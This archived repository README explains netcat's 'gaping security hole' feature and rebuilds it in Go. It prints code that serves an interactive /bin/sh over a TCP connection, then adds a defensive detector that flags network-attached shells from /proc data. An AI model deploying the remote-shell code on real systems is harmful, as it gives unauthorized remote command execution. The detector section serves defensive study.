This repository has been archived by the owner on Jul 8, 2023. It is now read-only.

Netcat gaping security hole

What was the Netcat Gaping Security Hole?

Netcat is the TCP/IP Swiss Army knife, a more flexible, scriptable version of Telnet. It contains a feature that allows the stdin and stdout of any arbitrary program to be redirected over TCP, enabling an attacker to run any shell script.

Creating it in Golang

By creating a pipe, I allow stdin and stdout to be redirected over TCP:

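// create the interactive shell process
cmd := exec.Command("/bin/sh", "-i")
// create the in-memory pipe that carries the shell's output
rp, wp := io.Pipe()

// bind the shell's stdin to the client connection (conn)
// and its stdout to the write end of the pipe
cmd.Stdin = conn
cmd.Stdout = wp

// copy the shell's output from the read end of the pipe back to the connection
go io.Copy(conn, rp)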
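
Seen from the defender's side, as an added example that is not part of the original repository: because `conn` and `wp` are not `*os.File` values, `os/exec` hands the shell OS pipes while the parent process keeps the TCP socket, whereas classic `nc -e` attaches the socket directly to the shell's stdio. The sketch below classifies both shapes from `/proc`-style data; `Proc`, `Classify`, `Sample` and every PID, path and inode in it are constructed for illustration.

```go
package main

import (
	"fmt"
	"path/filepath"
	"strings"
)

// Proc mirrors /proc/<pid>: Exe is the exe link, FDs maps fd number to link target.
type Proc struct {
	PPID int
	Exe  string
	FDs  map[int]string
}
var shells = map[string]bool{"sh": true, "bash": true, "dash": true, "zsh": true}

// Classify returns why pid looks like a network-attached shell, or "" if it does not.
func Classify(pid int, procs map[int]Proc) string {
	p := procs[pid]
	if !shells[filepath.Base(p.Exe)] {
		return ""
	}
	both := func(prefix string) bool {
		return strings.HasPrefix(p.FDs[0], prefix) && strings.HasPrefix(p.FDs[1], prefix)
	}
	if both("socket:[") { // classic nc -e: the socket is dup'ed onto fd 0 and 1
		return "stdio is a socket"
	}
	parent := procs[p.PPID] // zero value if the parent is not in the snapshot
	if !both("pipe:[") || shells[filepath.Base(parent.Exe)] {
		return ""
	}
	for _, target := range parent.FDs { // relay: parent copies pipe <-> socket
		if strings.HasPrefix(target, "socket:[") {
			return "stdio is piped to a parent holding a socket"
		}
	}
	return ""
}
// Sample is constructed data: a pipe relay, its shell, a terminal shell, a socket shell.
var Sample = map[int]Proc{
	410: {1, "/tmp/go-build/exe/main", map[int]string{3: "socket:[9001]", 4: "socket:[9002]"}},
	411: {410, "/bin/sh", map[int]string{0: "pipe:[9003]", 1: "pipe:[9004]"}},
	500: {499, "/bin/bash", map[int]string{0: "/dev/pts/0", 1: "/dev/pts/0"}},
	600: {1, "/bin/sh", map[int]string{0: "socket:[9100]", 1: "socket:[9100]"}},
}
func main() {
	for pid := range Sample {
		fmt.Println(pid, Classify(pid, Sample))
	}
}
```

Legitimate services that run a shell on behalf of a network client match the same shape, so treat a hit as a triage signal and allowlist known parents.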

How to run?

Server:

go run main.go

Client:

go run client/client.go